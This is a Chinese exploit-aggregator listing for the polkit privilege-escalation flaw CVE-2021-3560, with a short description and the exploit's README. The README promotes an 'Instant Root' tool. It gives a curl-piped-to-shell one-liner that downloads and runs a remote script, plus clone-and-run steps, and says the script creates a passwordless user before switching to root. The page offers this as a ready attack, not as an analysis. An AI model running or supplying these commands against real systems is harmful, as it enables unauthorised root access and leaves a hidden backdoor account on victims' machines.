POC详情: a0a685b47fc771912a61c4251434db7c23295c21

来源
关联漏洞
标题: polkit 代码问题漏洞 (CVE-2021-3560)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 存在代码问题漏洞,该漏洞源于当请求进程在调用polkit_system_bus_name_get_creds_sync之前断开与dbus-daemon的连接时,该进程无法获得进程的唯一uid和pid,也无法验证请求进程的特权。
描述
Polkit Exploit (CVE-2021-3560), no download capabilty? Copy and paste it!
介绍
# CVE-2021-3560
Polkit Instant Root Exploit

You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in:

> sh -c "$(curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh)"

Or you can download the .sh or copy and paste it. Run and Instant Root. User created is named 'n3on' with no password, script then switches to root.

<h1>Usage:</h1>
>git clone https://github.com/n3onhacks/CVE-2021-3560.git<br>
>chmod -R CVE-2021-3560<br>
>cd CVE-2021-3560<br>
>./polkit.sh<br><p>

  <i>*If you are not automatically root, type in 'sudo -s' to be root (See video).</i>

<h2>POC Video:</h2>
https://www.youtube.com/watch?v=UWfuoeTeTtU<p>
文件快照

[4.0K] /data/pocs/a0a685b47fc771912a61c4251434db7c23295c21 ├── [2.0K] polkit.sh └── [ 686] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。